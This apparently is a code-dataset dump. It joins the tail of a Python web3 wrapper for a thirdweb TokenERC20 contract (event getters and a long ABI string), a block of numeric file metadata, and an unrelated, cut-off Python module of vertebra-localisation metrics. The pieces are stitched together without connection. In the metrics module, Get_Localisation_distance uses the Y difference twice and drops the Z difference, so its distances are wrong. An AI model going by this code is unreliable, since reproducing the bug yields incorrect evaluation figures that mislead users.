.processReceipt(tx_receipt)
)
def get_delegate_changed_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for DelegateChanged event.
:param tx_hash: hash of transaction emitting DelegateChanged event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.DelegateChanged()
.processReceipt(tx_receipt)
)
def get_delegate_votes_changed_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for DelegateVotesChanged event.
:param tx_hash: hash of transaction emitting DelegateVotesChanged event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.DelegateVotesChanged()
.processReceipt(tx_receipt)
)
def get_paused_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for Paused event.
:param tx_hash: hash of transaction emitting Paused event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.Paused()
.processReceipt(tx_receipt)
)
def get_platform_fee_info_updated_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for PlatformFeeInfoUpdated event.
:param tx_hash: hash of transaction emitting PlatformFeeInfoUpdated
event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.PlatformFeeInfoUpdated()
.processReceipt(tx_receipt)
)
def get_primary_sale_recipient_updated_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for PrimarySaleRecipientUpdated event.
:param tx_hash: hash of transaction emitting
PrimarySaleRecipientUpdated event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.PrimarySaleRecipientUpdated()
.processReceipt(tx_receipt)
)
def get_role_admin_changed_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleAdminChanged event.
:param tx_hash: hash of transaction emitting RoleAdminChanged event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.RoleAdminChanged()
.processReceipt(tx_receipt)
)
def get_role_granted_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleGranted event.
:param tx_hash: hash of transaction emitting RoleGranted event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.RoleGranted()
.processReceipt(tx_receipt)
)
def get_role_revoked_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleRevoked event.
:param tx_hash: hash of transaction emitting RoleRevoked event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.RoleRevoked()
.processReceipt(tx_receipt)
)
def get_tokens_minted_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for TokensMinted event.
:param tx_hash: hash of transaction emitting TokensMinted event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.TokensMinted()
.processReceipt(tx_receipt)
)
def get_tokens_minted_with_signature_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for TokensMintedWithSignature event.
:param tx_hash: hash of transaction emitting TokensMintedWithSignature
event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.TokensMintedWithSignature()
.processReceipt(tx_receipt)
)
def get_transfer_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for Transfer event.
:param tx_hash: hash of transaction emitting Transfer event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.Transfer()
.processReceipt(tx_receipt)
)
def get_unpaused_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for Unpaused event.
:param tx_hash: hash of transaction emitting Unpaused event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC20.abi(),
)
.events.Unpaused()
.processReceipt(tx_receipt)
)
@staticmethod
def abi():
"""Return the ABI to the underlying contract."""
return json.loads(
'[{"inputs":[{"internalType":"address","name":"_thirdwebFee","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegator","type":"address"},{"indexed":true,"internalType":"address","name":"fromDelegate","type":"address"},{"indexed":true,"internalType":"address","name":"toDelegate","type":"address"}],"name":"DelegateChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegate","type":"address"},{"indexed":false,"internalType":"uint256","name":"previousBalance","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"DelegateVotesChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"platformFeeRecipient","type":"address"},{"indexed":false,"internalType":"uint256","name":"platformFeeBps","type":"uint256"}],"name":"PlatformFeeInfoUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"recipient","type":"address"}],"name":"PrimarySaleRecipientUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"mintedTo","type":"address"},{"indexed":false,"internalType":"uint256","name":"quantityMinted","type":"uint256"}],"name":"TokensMinted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"signer","type":"address"},{"indexed":true,"internalType":"address","name":"mintedTo","type":"address"},{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"price","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"indexed":false,"internalType":"struct ITokenERC20.MintRequest","name":"mintRequest","type":"tuple"}],"name":"TokensMintedWithSignature","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint32","name":"pos","type":"uint32"}],"name":"checkpoints","outputs":[{"components":[{"internalType":"uint32","name":"fromBlock","type":"uint32"},{"internalType":"uint224","name":"votes","type":"uint224"}],"internalType":"struct ERC20VotesUpgradeable.Checkpoint","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"contractType","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"contractVersion","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"delegatee","type":"address"}],"name":"delegate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"delegatee","type":"address"},{"internalType":"uint256","name":"nonce","type":"uint256"},{"internalType":"uint256","name":"expiry","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"delegateBySig","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"delegates","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"blockNumber","type":"uint256"}],"name":"getPastTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"blockNumber","type":"uint256"}],"name":"getPastVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getPlatformFeeInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"getRoleMember","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleMemberCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"getVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_defaultAdmin","type":"address"},{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"string","name":"_contractURI","type":"string"},{"internalType":"address[]","name":"_trustedForwarders","type":"address[]"},{"internalType":"address","name":"_primarySaleRecipient","type":"address"},{"internalType":"address","name":"_platformFeeRecipient","type":"address"},{"internalType":"uint256","name":"_platformFeeBps","type":"uint256"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"forwarder","type":"address"}],"name":"isTrustedForwarder","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mintTo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"price","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"internalType":"struct ITokenERC20.MintRequest","name":"_req","type":"tuple"},{"internalType":"bytes","name":"_signature","type":"bytes"}],"name":"mintWithSignature","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"bytes[]","name":"data","type":"bytes[]"}],"name":"multicall","outputs":[{"internalType":"bytes[]","name":"results","type":"bytes[]"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"numCheckpoints","outputs":[{"internalType":"uint32","name":"","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"uint256","name":"deadline","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"primarySaleRecipient","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_uri","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_platformFeeRecipient","type":"address"},{"internalType":"uint256","name":"_platformFeeBps","type":"uint256"}],"name":"setPlatformFeeInfo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_saleRecipient","type":"address"}],"name":"setPrimarySaleRecipient","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"price","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"internalType":"struct ITokenERC20.MintRequest","name":"_req","type":"tuple"},{"internalType":"bytes","name":"_signature","type":"bytes"}],"name":"verify","outputs":[{"internalType":"bool","name":"","type":"bool"},{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]' # noqa: E501 (line-too-long)
)
# pylint: disable=too-many-lines
| 38.140158
| 16,282
| 0.641616
| 19,034
| 183,683
| 5.932804
| 0.024798
| 0.077999
| 0.044277
| 0.042506
| 0.889112
| 0.860739
| 0.833598
| 0.815054
| 0.805605
| 0.752216
| 0
| 0.005267
| 0.24551
| 183,683
| 4,815
| 16,283
| 38.148079
| 0.809564
| 0.154772
| 0
| 0.760843
| 1
| 0.000301
| 0.120437
| 0.111034
| 0
| 0
| 0
| 0
| 0.021988
| 1
| 0.090663
| false
| 0.000904
| 0.004518
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
06cf0cb4053d0096953e1c20b191f39f2c697290
| 38,616
|
py
|
Python
|
utils/metrics.py
|
lsDrizzle/Btrfly-Net-Pytorch
|
bd59a02bf94cce235a47f7ddb5e689327d0de435
|
[
"MIT"
] | 9
|
2019-11-27T06:17:21.000Z
|
2020-11-15T06:59:37.000Z
|
utils/metrics.py
|
zlinzju/Btrfly-Net-Pytorch
|
bd59a02bf94cce235a47f7ddb5e689327d0de435
|
[
"MIT"
] | 2
|
2020-04-15T07:00:05.000Z
|
2021-04-02T02:35:23.000Z
|
utils/metrics.py
|
zlinzju/Btrfly-Net-Pytorch
|
bd59a02bf94cce235a47f7ddb5e689327d0de435
|
[
"MIT"
] | 4
|
2019-10-19T13:40:00.000Z
|
2020-11-09T15:54:13.000Z
|
import torch
import numpy as np
import json
import cv2
Dic = {0:'Z',1:'Y',2:'X'}
@torch.no_grad()
def decom(whole_dict):
label = []
dim_X = []
dim_Y = []
dim_Z = []
for index in range(len(whole_dict)):
current = whole_dict[index]
label.append(current['label'])
dim_X.append(current['X'])
dim_Y.append(current['Y'])
dim_Z.append(current['Z'])
return label, dim_X, dim_Y, dim_Z
@torch.no_grad()
def create_centroid_pos(Direction, Spacing, Size, position):
# dim0, dim1,dim2, label):
"""
:param Direction,Spacing, Size: from sitk raw.GetDirection(),GetSpacing(),GetSize()
:param position:[24,3]
:return:
"""
direction = np.round(list(Direction))
direc0 = direction[0:7:3]
direc1 = direction[1:8:3]
direc2 = direction[2:9:3]
dim0char = Dic[(np.argwhere((np.abs(direc0)) == 1))[0][0]]
dim1char = Dic[(np.argwhere((np.abs(direc1)) == 1))[0][0]]
dim2char = Dic[(np.argwhere((np.abs(direc2)) == 1))[0][0]]
resolution = Spacing
w, h, c = Size[0], Size[1], Size[2]
jsonlist = []
for i in range(24):
dim0, dim1, dim2 = position[i:i + 1, 0], position[i:i + 1, 1], position[i:i + 1, 2]
if dim0 >= 0:
label = i + 1
if np.sum(direc0) == -1:
if dim0char == 'X':
Jsondim0 = dim0 * resolution[0]
else:
Jsondim0 = (w - dim0) * resolution[0]
else:
if dim0char == 'X':
Jsondim0 = (w - dim0) * resolution[0]
else:
Jsondim0 = dim0 * resolution[0]
if np.sum(direc1) == -1:
if dim1char == 'X':
Jsondim1 = dim1 * resolution[1]
else:
Jsondim1 = (h - dim1) * resolution[1]
else:
if dim1char == 'X':
Jsondim1 = (h - dim1) * resolution[1]
else:
Jsondim1 = dim1 * resolution[1]
if np.sum(direc2) == -1:
if dim2char == 'X':
Jsondim2 = dim2 * resolution[2]
else:
Jsondim2 = (c - dim2) * resolution[2]
else:
if dim2char == 'X':
Jsondim2 = (c - dim2) * resolution[2]
else:
Jsondim2 = dim2 * resolution[2]
jsonlist.append({dim0char: Jsondim0, dim1char: Jsondim1, dim2char: Jsondim2, 'label': label})
return jsonlist
@torch.no_grad()
def Get_Identification_Rate(ground_truth_list: object, pred_list: object) -> object:
"""
:param ground_truth_list: dict-->{'X':XXX, 'Y':XXX, 'Z':XXX}
:param pred_list:
:return:
"""
correctpred = 0
whole_number = 0
whole_number_gt = 0
for i in range(len(pred_list)):
label_GT, dim_X_GT, dim_Y_GT, dim_Z_GT = decom(ground_truth_list[i])
label_PRED, dim_X_PRED, dim_Y_PRED, dim_Z_PRED = decom(pred_list[i])
whole_number += len(label_PRED)
whole_number_gt += len(label_GT)
for idx in range(len(label_PRED)):
label_c = label_PRED[idx]
if label_c in label_GT:
pos = label_GT.index(label_c)
dif_X = dim_X_GT[pos] - dim_X_PRED[idx]
dif_Y = dim_Y_GT[pos] - dim_Y_PRED[idx]
dif_Z = dim_Z_GT[pos] - dim_Z_PRED[idx]
distance = pow((pow(dif_X, 2) + pow(dif_Y, 2) + pow(dif_Z, 2)), 0.5)
if distance < 20:
correctpred += 1
iden_rate = correctpred / whole_number if whole_number != 0 else 0
return iden_rate, correctpred / whole_number_gt
@torch.no_grad()
def Get_Localisation_distance(ground_truth, pred):
"""
:param ground_truth: from each subject
:param pred:
:return:
"""
hit = 0
distance = 0
label_GT, dim_X_GT, dim_Y_GT, dim_Z_GT = decom(ground_truth)
label_PRED, dim_X_PRED, dim_Y_PRED, dim_Z_PRED = decom(pred)
for idx in range(len(label_PRED)):
label_c = label_PRED[idx]
if label_c in label_GT:
hit += 1
pos = label_GT.index(label_c)
dif_X = dim_X_GT[pos] - dim_X_PRED[idx]
dif_Y = dim_Y_GT[pos] - dim_Y_PRED[idx]
dif_Z = dim_Z_GT[pos] - dim_Z_PRED[idx]
distance += pow((pow(dif_X, 2) + pow(dif_Y, 2) + pow(dif_Y, 2)), 0.5)
if hit == 0 :
print('ALL MISSED')
loc_dis = []
else:
loc_dis = distance / hit
return loc_dis
@torch.no_grad()
def Get_Recall_AND_Precision(ground_truth, pred):
"""
:param ground_truth: from each subject
:param pred:
:return:
"""
hit = 0
label_GT, dim_X_GT, dim_Y_GT, dim_Z_GT = decom(ground_truth)
label_PRED, dim_X_PRED, dim_Y_PRED, dim_Z_PRED = decom(pred)
GT_length = len(label_GT)
PRED_length = len(label_PRED)
for idx in range(PRED_length):
label_c = label_PRED[idx]
if label_c in label_GT:
pos = label_GT.index(label_c)
dif_X = dim_X_GT[pos] - dim_X_PRED[idx]
dif_Y = dim_Y_GT[pos] - dim_Y_PRED[idx]
dif_Z = dim_Z_GT[pos] - dim_Z_PRED[idx]
distance = pow((pow(dif_X, 2) + pow(dif_Y, 2) + pow(dif_Z, 2)), 0.5)
if distance < 20:
hit += 1
Recall = hit / GT_length
Precision = hit / PRED_length
return Recall, Precision
@torch.no_grad()
def pred_pos(device, output_sag_batch, output_cor_batch, direction, crop_info, spacing, cor_pad, sag_pad):
"""
Compute the tensor product between output_sag and output_cor,
then use argmax to find the position of the ith vertebra in channel i.
Let's say the original 3D data has a shape of (B, C, d0, d1, d2), normally with C=25.
Parameters:
output_sag & output_cor: output of the Btrfly Net
direc: it should be ('Z', 'Y', 'X') or ('Y', 'X', 'Z'), indicating the direction of the subject
Return:
a (BxCx3) tensor about the positions of the bones of every subjects in the batch
"""
if output_sag_batch.shape[:2] != output_cor_batch.shape[:2]:
raise Exception("output_sag and output_cor have different batch sizes or channel numbers!")
B, C = output_sag_batch.shape[0], output_sag_batch.shape[1]
# threshold to reduce noise
threshold_noise = 0
threshold_label = torch.from_numpy(np.arange(0, 0.4, 0.01)).float()
position_batch = torch.Tensor(len(threshold_label), B, C, 4)
resolution = 1.0
ori_d0, ori_d1, ori_d2 = np.zeros(B), np.zeros(B), np.zeros(B)
for i in range(B):
direc = (direction[0][i], direction[1][i], direction[2][i])
if (direc != ('Z', 'Y', 'X')) & (direc != ('Y', 'X', 'Z')):
raise Exception('Unknown direction!')
# select ith subject
output_cor = output_cor_batch[i, :, :, :]
output_sag = output_sag_batch[i, :, :, :]
# reduce the noise according to threshold
reduce_noise_sag = torch.where(output_sag < threshold_noise, torch.full_like(output_sag, 0), output_sag)
reduce_noise_cor = torch.where(output_cor < threshold_noise, torch.full_like(output_cor, 0), output_cor)
max_value, max_idx = torch.zeros(24), torch.zeros(24)
if direc == ('Z', 'Y', 'X'):
# sag:(C, d1, d2), cor:(C, d0, d2)
if (output_sag.shape[2] != output_cor.shape[2]):
raise Exception("sag and cor should have an identical size in the last dimension!")
d0, d1, d2 = output_cor.shape[1], output_sag.shape[1], output_sag.shape[2]
ori_d0[i], ori_d1[i], ori_d2[i] = d0 - cor_pad[2][i] - cor_pad[3][i], d1 - sag_pad[2][i] - sag_pad[3][i], d2 - cor_pad[0][i] - cor_pad[1][i]
#extend them to (d0, d1, d2)
for c_num in range(24):
reduce_noise_sag_one_cha = reduce_noise_sag[c_num, sag_pad[2][i]:d1-sag_pad[3][i], sag_pad[0][i]:d2-sag_pad[1][i]]
reduce_noise_cor_one_cha = reduce_noise_cor[c_num, cor_pad[2][i]:d0-cor_pad[3][i], cor_pad[0][i]:d2-cor_pad[1][i]]
assert reduce_noise_cor_one_cha.shape[1] == reduce_noise_sag_one_cha.shape[1]
reduce_noise_sag_one_cha = reduce_noise_sag_one_cha.unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
reduce_noise_cor_one_cha = reduce_noise_cor_one_cha.unsqueeze(1).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
# find maximum value for each batch and channel
max_value[c_num], max_idx[c_num] = torch.max(product.view(-1), dim=0)
else:
# sag:(C, d0, d1), cor:(C, d1, d2)
if (output_sag.shape[2] != output_cor.shape[1]):
raise Exception("sag and cor should have an identical size in some dimension!")
d0, d1, d2 = output_sag.shape[1], output_sag.shape[2], output_cor.shape[2]
ori_d0[i], ori_d1[i], ori_d2[i] = d0 - sag_pad[2][i] - sag_pad[3][i], d1 - sag_pad[0][i] - sag_pad[1][i], d2 - cor_pad[0][i] - cor_pad[1][i]
#extend them to (d0, d1, d2)
for c_num in range(24):
reduce_noise_sag_one_cha = reduce_noise_sag[c_num, sag_pad[2][i]:d0 - sag_pad[3][i], sag_pad[0][i]:d1 - sag_pad[1][i]]
reduce_noise_cor_one_cha = reduce_noise_cor[c_num, cor_pad[2][i]:d1 - cor_pad[3][i], cor_pad[0][i]:d2 - cor_pad[1][i]]
assert reduce_noise_cor_one_cha.shape[0] == reduce_noise_sag_one_cha.shape[1]
reduce_noise_sag_one_cha = reduce_noise_sag_one_cha.unsqueeze(2).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
reduce_noise_cor_one_cha = reduce_noise_cor_one_cha.unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
# find maximum value for each batch and channel
max_value[c_num], max_idx[c_num] = torch.max(product.view(-1), dim=0)
# translate the indexes to 3D form
